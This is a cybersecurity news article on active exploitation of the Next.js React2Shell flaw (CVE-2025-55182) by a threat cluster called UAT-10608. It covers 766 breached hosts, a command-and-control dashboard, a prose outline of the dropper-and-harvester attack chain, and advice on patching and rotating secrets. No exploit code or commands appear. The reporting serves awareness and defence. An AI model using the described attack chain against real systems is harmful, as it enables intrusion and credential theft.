Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Nebula AI Platform Automates Pen Testing to Find Vulnerabilities
July 3, 2026
PureLog Stealer Uses Blogspot and PowerShell to Deliver Malware
July 3, 2026
FBI Warns TeamPCP Hackers Exploit Developer Tools in Supply Chain Attacks
July 3, 2026
Home/Threats/Critical Next.js React2Shell flaw exploited to steal credentials from 766 hosts
Threats

Critical Next.js React2Shell flaw exploited to steal credentials from 766 hosts

Key Takeaways A critical vulnerability, CVE-2025-55182 (React2Shell), in Next.js React Server Components is being actively exploited. Attackers leveraged this flaw to compromise 766 servers in 24...

Jennifer sherman
Jennifer sherman
April 7, 2026 4 Min Read
38 0

Key Takeaways

  • A critical vulnerability, CVE-2025-55182 (React2Shell), in Next.js React Server Components is being actively exploited.
  • Attackers leveraged this flaw to compromise 766 servers in 24 hours, stealing credentials and sensitive data across major cloud providers.
  • The threat actor, UAT-10608, uses an automated attack chain and a custom C2 framework called NEXUS Listener.
  • The vulnerability has a CVSS score of 10.0, allowing unauthenticated remote code execution.
  • Immediate patching and credential rotation are crucial for affected Next.js applications.

A severe security vulnerability, dubbed React2Shell and tracked as CVE-2025-55182, is currently under active exploitation, impacting web applications built using the popular Next.js framework. This widespread cyberattack campaign has rapidly compromised numerous internet-facing systems.

Table Of Content

  • Key Takeaways
  • The React2Shell Vulnerability
  • Automated and Indiscriminate Attacks
  • The NEXUS Listener: Orchestrating Data Exfiltration
  • What You Should Do

Within a mere 24-hour period, threat actors successfully breached 766 servers, exfiltrating a substantial volume of sensitive information, including passwords, cloud keys, and database credentials.

The React2Shell Vulnerability

The core of this attack lies in CVE-2025-55182, also known as React2Shell, which carries a maximum CVSS severity score of 10.0. This critical flaw resides within the React Server Components (RSC) Flight protocol, specifically concerning how a React server processes HTTP requests directed at Server Function endpoints. The vulnerability allows an attacker to execute arbitrary code on the server through a single, specially crafted HTTP request, requiring no prior authentication. Due to its significant downstream impact, Next.js has also been assigned a separate tracking number, CVE-2025-66478, for its exposure to this flaw.

Researchers at Cisco Talos identified this highly automated operation, attributing it to a threat cluster they are now tracking as UAT-10608.

Automated and Indiscriminate Attacks

The campaign exhibits a systematic and indiscriminate approach. Attackers utilize scanning services such as Shodan and Censys to sweep the internet for publicly accessible Next.js deployments running vulnerable versions of React Server Components. Once a target is identified, the entire exploitation and data exfiltration process proceeds autonomously, requiring no further manual intervention after the initial exploit is triggered.

The extent of the damage is considerable. Across diverse geographical regions and major cloud providers, including AWS, Google Cloud, and Microsoft Azure, at least 766 hosts were confirmed compromised within a single day. The stolen data encompasses a wide array of critical assets, such as database connection strings, SSH private keys, cloud access tokens, GitHub tokens, Stripe live secret keys, Kubernetes service account credentials, environment variables, and shell command histories. More than 10,120 files were collectively harvested from the affected systems.

The ramifications of this campaign extend beyond immediate account takeover. Several breached hosts exposed package registry authentication files, including npm and pip configuration files containing registry credentials. Should attackers leverage these tokens to inject malicious versions of trusted software packages, the potential harm could propagate to any organization that installs those packages, thereby posing a significant supply chain threat.

The NEXUS Listener: Orchestrating Data Exfiltration

To manage the torrent of stolen information from hundreds of compromised servers, UAT-10608 has deployed a bespoke command-and-control (C2) framework named NEXUS Listener. This web-based platform, currently in its third version, furnishes operators with a graphical dashboard. From this interface, they can browse compromised hosts, categorize stolen credentials, review harvesting statistics, and ascertain the number of credentials successfully extracted during each phase of an attack.

The attack sequence begins with the identification of a vulnerable endpoint, followed by the transmission of a single malicious HTTP request to the RSC Server Function endpoint. The server then deserializes the crafted payload, executing arbitrary code. This action drops a lightweight shell script into a temporary directory under a randomized filename, aiming to evade detection. This initial dropper subsequently retrieves a multi-phase credential harvesting script from the attacker’s infrastructure.

Each subsequent phase is dedicated to collecting a different category of data, ranging from SSH keys and cloud tokens to database passwords. This harvested information is then reported back to the NEXUS Listener C2 server on port 8080, along with the victim’s hostname and a phase identifier. The highly automated nature of this process explains how UAT-10608 managed to compromise hundreds of systems with such speed.

What You Should Do

  • Immediately apply patches to the latest available version of Next.js for organizations utilizing App Router or any implementation of React Server Components.
  • Rotate all secrets in potentially affected environments, including AWS keys, database passwords, SSH keys, API tokens, and GitHub tokens, without delay.
  • Audit containers for overly permissive roles and enforce IMDSv2 on cloud instances to enhance security.
  • Cease reusing SSH key pairs across different systems to limit lateral movement in case of compromise.
  • Implement robust monitoring of outbound HTTP traffic from application containers, specifically looking for unexpected connections to unknown IP addresses on port 8080, as this can indicate an active breach.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackBreachCVEExploitHackerPatchSecurityThreatVulnerability

Share Article

Jennifer sherman

Jennifer sherman

Jennifer is a cybersecurity news reporter covering data breaches, ransomware campaigns, and dark web markets. With a background in incident response, Jennifer provides unique insights into how organizations respond to cyber attacks and the evolving tactics of threat actors. Her reporting has covered major breaches affecting millions of users and has helped organizations understand emerging threats. Jennifer combines technical knowledge with investigative journalism to deliver in-depth coverage of cybersecurity incidents.

Previous Post

ClickFix Lure Drops Node.js RAT, Tor C2 on Windows Users

Next Post

Fake npm Package Steals Tokens From AI Tools Claude, Cursor

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Former MEP Investigating Spyware Abuses Hacked With Pegasus
July 3, 2026
Critical WatchGuard Firebox OS Flaws Let Attackers Execute Code
July 3, 2026
Critical Microsoft Exchange SSRF Vulnerability Gets Public PoC Exploit
July 3, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us